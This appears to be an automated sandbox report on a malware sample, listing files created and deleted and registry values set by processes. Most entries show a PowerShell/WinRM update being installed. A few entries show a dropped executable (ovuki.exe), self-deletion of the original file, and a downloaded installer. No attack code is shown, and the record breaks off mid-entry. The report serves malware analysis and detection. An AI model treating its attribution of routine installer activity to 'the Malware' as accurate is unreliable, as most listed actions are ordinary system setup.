%System%\WindowsPowerShell\v1.0\SETA5.tmp (0 bytes)
%System%\SET25.tmp (0 bytes)
%System%\SET13.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET4E.tmp (0 bytes)
%System%\SET20.tmp (0 bytes)
%System%\SET14.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET59.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET57.tmp (0 bytes)
%WinDir%\inf\SET32.tmp (0 bytes)
%WinDir%\$968930Uinstall_KB968930$\SETBE.tmp (0 bytes)
%System%\SET7.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET80.tmp (0 bytes)
%System%\GroupPolicy\Adm\SET34.tmp (0 bytes)
%System%\SET2A.tmp (0 bytes)
%WinDir%\inf\oem10.PNF (0 bytes)
%System%\WindowsPowerShell\v1.0\Modules\BitsTransfer\en\SETC3.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET3C.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET56.tmp (0 bytes)
%System%\WsmWmiPl.dll (0 bytes)
%System%\WindowsPowerShell\v1.0\SET62.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET3D.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET79.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETA1.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET85.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET53.tmp (0 bytes)
%System%\GroupPolicy\Adm\WindowsRemoteShell.adm (0 bytes)
%System%\WindowsPowerShell\v1.0\SET54.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETC8.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETB0.tmp (0 bytes)
%System%\winrm\0409\winrm.ini (0 bytes)
%System%\WindowsPowerShell\v1.0\SET66.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\Modules\BitsTransfer\en\SETC4.tmp (0 bytes)
%System%\winrscmd.dll (0 bytes)
%System%\SET2B.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET6D.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET76.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET73.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET7F.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET9C.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET6C.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET5A.tmp (0 bytes)
%System%\SET2E.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETC7.tmp (0 bytes)
%System%\wsmanhttpconfig.exe (0 bytes)
%System%\WindowsPowerShell\v1.0\SET7D.tmp (0 bytes)
%System%\winrm.cmd (0 bytes)
%System%\SETE.tmp (0 bytes)
%System%\winrm.vbs (0 bytes)
%System%\WindowsPowerShell\v1.0\SETA3.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETA2.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET88.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET5E.tmp (0 bytes)
%System%\SET6.tmp (0 bytes)
%System%\GroupPolicy\Adm\SET36.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETA6.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETAE.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETB3.tmp (0 bytes)
%System%\wbem\SET4.tmp (0 bytes)
%System%\SET17.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET64.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET67.tmp (0 bytes)
%System%\SETA.tmp (0 bytes)
%System%\SET22.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET51.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET9B.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET75.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETA7.tmp (0 bytes)
%System%\SET27.tmp (0 bytes)
%System%\GroupPolicy\Adm\SET1B.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET72.tmp (0 bytes)
%System%\SET11.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETCA.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET3F.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET4F.tmp (0 bytes)
%System%\WsmAuto.dll (0 bytes)
%System%\WindowsPowerShell\v1.0\SETCE.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET97.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET81.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET4B.tmp (0 bytes)
%System%\SET8.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET90.tmp (0 bytes)
%System%\SETF.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET9D.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETC9.tmp (0 bytes)
%System%\wbem\wsmAuto.mof (0 bytes)
%WinDir%\$968930Uinstall_KB968930$\SETBD.tmp (0 bytes)
%System%\wsmplpxy.dll (0 bytes)
%System%\WindowsPowerShell\v1.0\SET5F.tmp (0 bytes)
%System%\SET26.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET5B.tmp (0 bytes)
%System%\SET21.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET8E.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETB2.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET38.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET49.tmp (0 bytes)
%System%\SET16.tmp (0 bytes)
%System%\GroupPolicy\Adm\windowsremotemanagement.adm (0 bytes)
%System%\WindowsPowerShell\v1.0\SET9F.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET4A.tmp (0 bytes)
%WinDir%\SECD0.tmp (0 bytes)
%System%\GroupPolicy\Adm\EventForwarding.adm (0 bytes)
%System%\WindowsPowerShell\v1.0\SET4D.tmp (0 bytes)
%System%\winrmprov.dll (0 bytes)
%System%\WindowsPowerShell\v1.0\SETAF.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET91.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET87.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET44.tmp (0 bytes)
%System%\GroupPolicy\Adm\SET1C.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETB6.tmp (0 bytes)
%System%\wsmprovhost.exe (0 bytes)
%System%\WindowsPowerShell\v1.0\Modules\BitsTransfer\SETC2.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET55.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\Examples\SETBC.tmp (0 bytes)
%System%\winrmprov.mof (0 bytes)
%WinDir%\imsins.BAK (0 bytes)
%System%\SETB.tmp (0 bytes)
%System%\SET1F.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET98.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET94.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET5D.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET95.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET65.tmp (0 bytes)
%WinDir%\inf\oem10.inf (0 bytes)
%System%\SET28.tmp (0 bytes)
%System%\SET5.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET92.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETA4.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET7E.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET45.tmp (0 bytes)
%System%\winrshost.exe (0 bytes)
%System%\WindowsPowerShell\v1.0\SET9A.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET6E.tmp (0 bytes)
%System%\SET31.tmp (0 bytes)
%WinDir%\inf\SET18.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETAC.tmp (0 bytes)
%Documents and Settings%\All Users\Start Menu\Programs\Accessories\Windows PowerShell\@.lnk (0 bytes)
%System%\WsmPty.xsl (0 bytes)
%System%\WindowsPowerShell\v1.0\SET3A.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET89.tmp (0 bytes)
%System%\SET29.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET82.tmp (0 bytes)
%System%\WsmRes.dll (0 bytes)
%System%\WindowsPowerShell\v1.0\SETB5.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET7A.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETCD.tmp (0 bytes)
%WinDir%\Temp\UPD3.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET69.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETA9.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETAD.tmp (0 bytes)
%System%\SET2C.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET8B.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\Modules\BitsTransfer\SETC1.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET8D.tmp (0 bytes)
%System%\SET15.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET4C.tmp (0 bytes)
%System%\wbem\SET1E.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET61.tmp (0 bytes)
%System%\SET2D.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETAA.tmp (0 bytes)
%System%\SET24.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETB1.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET6F.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET52.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET43.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET8F.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET70.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET96.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET93.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET50.tmp (0 bytes)
%System%\winrssrv.dll (0 bytes)
%WinDir%\inf\WindowsRemoteShell.adm (0 bytes)
%System%\WindowsPowerShell\v1.0\SET7B.tmp (0 bytes)
%System%\winrm\0409\SET1D.tmp (0 bytes)
%System%\SETD.tmp (0 bytes)
%System%\SET10.tmp (0 bytes)
%WinDir%\inf\SET19.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET47.tmp (0 bytes)
%System%\SET9.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET8A.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETC6.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET6B.tmp (0 bytes)
%System%\winrm\0409\SET37.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETB9.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETBB.tmp (0 bytes)
%System%\winrs.exe (0 bytes)
%System%\WindowsPowerShell\v1.0\SET60.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETCB.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET39.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET9E.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET40.tmp (0 bytes)
%System%\SET2F.tmp (0 bytes)
%WinDir%\Help\SETC5.tmp (0 bytes)
%System%\WsmSvc.dll (0 bytes)
%System%\WindowsPowerShell\v1.0\SET78.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET5C.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET71.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET6A.tmp (0 bytes)
%System%\winrsmgr.dll (0 bytes)
%System%\SET30.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETA8.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETB8.tmp (0 bytes)
%System%\GroupPolicy\Adm\SET1A.tmp (0 bytes)
%System%\SET23.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET3B.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET42.tmp (0 bytes)
%System%\WsmTxt.xsl (0 bytes)
%System%\WindowsPowerShell\v1.0\SETAB.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET77.tmp (0 bytes)
%WinDir%\inf\SET33.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET83.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETB4.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET63.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET68.tmp (0 bytes)

The process mscorsvw.exe:3456 makes changes in the file system.
The Malware creates and/or writes to the following file(s):

%WinDir%\assembly\NativeImages_v2.0.50727_32\Temp\ZAPD2.tmp\Microsoft.PowerShell.Commands.Diagnostics.dll (33116 bytes)

The Malware deletes the following file(s):

%WinDir%\assembly\NativeImages_v2.0.50727_32\Temp\ZAPD2.tmp (0 bytes)
%WinDir%\assembly\NativeImages_v2.0.50727_32\index59.dat (0 bytes)

The process mscorsvw.exe:3532 makes changes in the file system.
The Malware creates and/or writes to the following file(s):

%WinDir%\Microsoft.NET\Framework\v4.0.30319\ngen_service.log (514 bytes)
%WinDir%\Microsoft.NET\Framework\v4.0.30319\NGEN_SERVICE.LOG (70080 bytes)

The process mscorsvw.exe:2700 makes changes in the file system.
The Malware creates and/or writes to the following file(s):

%WinDir%\assembly\NativeImages_v2.0.50727_32\Temp\ZAPD5.tmp\Microsoft.PowerShell.ConsoleHost.dll (33378 bytes)

The Malware deletes the following file(s):

%WinDir%\assembly\NativeImages_v2.0.50727_32\index5c.dat (0 bytes)
%WinDir%\assembly\NativeImages_v2.0.50727_32\Microsoft.PowerShel# (0 bytes)
%WinDir%\assembly\NativeImages_v2.0.50727_32\Temp\ZAPD5.tmp (0 bytes)

The process mscorsvw.exe:3136 makes changes in the file system.
The Malware creates and/or writes to the following file(s):

%WinDir%\assembly\NativeImages_v2.0.50727_32\Temp\ZAPD1.tmp\Microsoft.BackgroundIntelligentTransfer.Management.dll (27440 bytes)

The Malware deletes the following file(s):

%WinDir%\assembly\NativeImages_v2.0.50727_32\Temp\ZAPD1.tmp (0 bytes)
%WinDir%\assembly\NativeImages_v2.0.50727_32\index58.dat (0 bytes)

The process mscorsvw.exe:3816 makes changes in the file system.
The Malware creates and/or writes to the following file(s):

%WinDir%\assembly\NativeImages_v2.0.50727_32\Temp\ZAPD3.tmp\Microsoft.PowerShell.Commands.Management.dll (45020 bytes)

The Malware deletes the following file(s):

%WinDir%\assembly\NativeImages_v2.0.50727_32\Microsoft.PowerShel# (0 bytes)
%WinDir%\assembly\NativeImages_v2.0.50727_32\Temp\ZAPD3.tmp (0 bytes)
%WinDir%\assembly\NativeImages_v2.0.50727_32\index5a.dat (0 bytes)

The process mscorsvw.exe:1112 makes changes in the file system.
The Malware creates and/or writes to the following file(s):

%WinDir%\assembly\NativeImages_v2.0.50727_32\Temp\ZAPD4.tmp\Microsoft.PowerShell.Commands.Utility.dll (40638 bytes)

The Malware deletes the following file(s):

%WinDir%\assembly\NativeImages_v2.0.50727_32\Microsoft.PowerShel# (0 bytes)
%WinDir%\assembly\NativeImages_v2.0.50727_32\index5b.dat (0 bytes)
%WinDir%\assembly\NativeImages_v2.0.50727_32\Temp\ZAPD4.tmp (0 bytes)

The process mscorsvw.exe:2940 makes changes in the file system.
The Malware creates and/or writes to the following file(s):

%WinDir%\assembly\NativeImages_v2.0.50727_32\Temp\ZAPD6.tmp\Microsoft.PowerShell.Editor.dll (64500 bytes)

The Malware deletes the following file(s):

%WinDir%\assembly\NativeImages_v2.0.50727_32\Temp\ZAPD6.tmp (0 bytes)
%WinDir%\assembly\NativeImages_v2.0.50727_32\Microsoft.PowerShel# (0 bytes)
%WinDir%\assembly\NativeImages_v2.0.50727_32\index5d.dat (0 bytes)

The processes PSCustomSetupUtil.exe:3868, 2844, 2924, 3140, 3004, 3060, 3308, 3164, 3232, 3028, 3104, 3256, 3892, 3844, 2872, 3936, 3984, 2972, 3284, 2896, 3192, 3960 and 2792 make changes in the file system. PSCustomSetupUtil.exe is a setup helper shipped in the KB968930 package; every write lands in %WinDir%\assembly\tmp\<random>, the staging directory Fusion uses while installing an assembly into the global assembly cache, so each instance is installing one PowerShell or WSMan assembly. Per process, the file created and/or written:

3868: %WinDir%\assembly\tmp\SADGJMPS\Microsoft.PowerShell.Editor.dll (32824 bytes)
2844: %WinDir%\assembly\tmp\WEHLORUX\Microsoft.PowerShell.ConsoleHost.dll (7192 bytes)
2924: %WinDir%\assembly\tmp\FY147ADG\Microsoft.PowerShell.Security.dll (2392 bytes)
3140: %WinDir%\assembly\tmp\HZ369CFI\Microsoft.PowerShell.ConsoleHost.resources.dll (1552 bytes)
3004: %WinDir%\assembly\tmp\CUX036AD\Microsoft.WSMan.Runtime.dll (7 bytes)
3060: %WinDir%\assembly\tmp\J369CFIL\Microsoft.BackgroundIntelligentTransfer.Management.dll (1856 bytes)
3308: %WinDir%\assembly\tmp\CUX0369C\Microsoft.BackgroundIntelligentTransfer.Management.resources.dll (7 bytes)
3164: %WinDir%\assembly\tmp\7PSVY147\Microsoft.PowerShell.Commands.Management.resources.dll (1552 bytes)
3232: %WinDir%\assembly\tmp\O7BEHKNQ\Microsoft.PowerShell.Security.resources.dll (9 bytes)
3028: %WinDir%\assembly\tmp\2LORUX03\Microsoft.WSMan.Management.dll (9608 bytes)
3104: %WinDir%\assembly\tmp\I0369CGJ\System.Management.Automation.resources.dll (9320 bytes)
3256: %WinDir%\assembly\tmp\9RUX0369\Microsoft.PowerShell.Commands.Diagnostics.resources.dll (10 bytes)
3892: %WinDir%\assembly\tmp\4NQTWZ36\Microsoft.PowerShell.GPowerShell.dll (22192 bytes)
3844: %WinDir%\assembly\tmp\GZ258C0P\Microsoft.PowerShell.GraphicalHost.dll (9608 bytes)
2872: %WinDir%\assembly\tmp\RADGJMPS\Microsoft.PowerShell.Commands.Management.dll (9320 bytes)
3936: %WinDir%\assembly\tmp\ZILORUX0\Microsoft.PowerShell.GraphicalHost.resources.dll (784 bytes)
3984: %WinDir%\assembly\tmp\2LOSVY14\Microsoft.PowerShell.GPowerShell.resources.dll (1552 bytes)
2972: %WinDir%\assembly\tmp\CVY147AD\Microsoft.PowerShell.Commands.Diagnostics.dll (3616 bytes)
3284: %WinDir%\assembly\tmp\BTWZ258B\Microsoft.WSMan.Management.resources.dll (13 bytes)
2896: %WinDir%\assembly\tmp\4NQTW036\Microsoft.PowerShell.Commands.Utility.dll (20624 bytes)
3192: %WinDir%\assembly\tmp\ZHKNQUX0\Microsoft.PowerShell.Commands.Utility.resources.dll (1552 bytes)
3960: %WinDir%\assembly\tmp\P8BEHKNR\Microsoft.PowerShell.Editor.resources.dll (2392 bytes)
2792: %WinDir%\assembly\tmp\HZ258BEH\System.Management.Automation.dll (81046 bytes)

The process PSSetupNativeUtils.exe:2068 makes changes in the file system.
The Malware creates and/or writes to the following file(s):

%Documents and Settings%\All Users\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk (2 bytes)

The process regsvr32.exe:436 makes changes in the file system.
The Malware creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Cookies\Current_User@microsoft[1].txt (166 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\uk-ua[1].htm (29849 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Cookies\index.dat (776 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\ovuki\ovuki.exe (259 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@microsoft[2].txt (166 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\desktop.ini (67 bytes)

The Malware deletes the following file(s):

%Documents and Settings%\%current user%\Cookies\Current_User@microsoft[1].txt (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\uk-ua[1].htm (0 bytes)
C:\%original file name%.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\ovuki\ovuki.exe (0 bytes)

The process regsvr32.exe:780 makes changes in the file system.
The Malware creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\WindowsXP-KB968930-x86-ENG.exe (45823 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\WindowsXP-KB968930-x86-ENG[1].exe (2977755 bytes)

The Malware deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\WindowsXP-KB968930-x86-ENG[1].exe (0 bytes)

Registry activity

The process mofcomp.exe:2768 makes changes in the system registry.
The Malware creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "12 DE A3 1C FE 42 81 94 59 54 82 8D C5 37 EC 4A"

The process WindowsXP-KB968930-x86-ENG.exe:804 makes changes in the system registry.
The Malware creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "D8 8C 69 EE 1A 40 1C BC 83 44 BC 1A 9D 50 1C 3F"

The process ngen.exe:4084 makes changes in the system registry.
The Malware creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "5E 7E A4 AA CF 9E 33 28 26 36 D7 87 51 9F 8A 2B"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.GraphicalHost,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Status" = "3"
"Priority" = "1"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\ListenedState]
"RootstoreDirty" = "1"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.GraphicalHost,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "2"
"Scenario" = "32"

The process ngen.exe:3616 makes changes in the system registry.
The Malware creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "58 1E D7 40 E1 27 15 3D 49 2A 91 7B 2E 39 3D 8E"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.WSMan.Runtime,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Scenario" = "32"
"Status" = "2"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\ListenedState]
"RootstoreDirty" = "1"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.WSMan.Runtime,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Priority" = "1"
"Status" = "3"

The process ngen.exe:3712 makes changes in the system registry.
The Malware creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "16 8D 70 CD 24 D9 87 33 3F 20 88 9F 76 C1 FD DB"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.WSMan.Management.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "2"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.WSMan.Management.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Priority" = "1"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\ListenedState]
"RootstoreDirty" = "1"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.WSMan.Management.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Status" = "3"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.WSMan.Management.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Scenario" = "32"

The process ngen.exe:3636 makes changes in the system registry.
The Malware creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "31 DF 77 DE CE C1 E3 3C B5 F4 69 FE 21 E3 C9 A1"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.BackgroundIntelligentTransfer.Management,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Priority" = "1"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\ListenedState]
"RootstoreDirty" = "1"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.BackgroundIntelligentTransfer.Management,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Status" = "3"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.BackgroundIntelligentTransfer.Management,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Scenario" = "32"
"Status" = "2"

The process ngen.exe:3672 makes changes in the system registry.
The Malware creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "63 C6 25 79 87 F7 2A C4 4C E7 B8 46 50 57 3C B6"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Utility.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "2"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Utility.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Status" = "3"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\ListenedState]
"RootstoreDirty" = "1"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Utility.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Priority" = "1"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Utility.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Scenario" = "32"

The process ngen.exe:252 makes changes in the system registry.
The Malware creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "53 DE D4 0A 14 3D EF 73 4D 63 5D 9A 83 E7 3C 26"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Editor.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "2"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Editor.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Status" = "3"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\ListenedState]
"RootstoreDirty" = "1"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Editor.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Priority" = "1"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Editor.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Scenario" = "32"

The process ngen.exe:3652 makes changes in the system registry.
The Malware creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "93 81 B6 07 CE 82 E6 42 00 0A 5B 8D 1D 22 82 E3"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.ConsoleHost.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Scenario" = "32"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.ConsoleHost.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Priority" = "1"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\ListenedState]
"RootstoreDirty" = "1"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.ConsoleHost.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
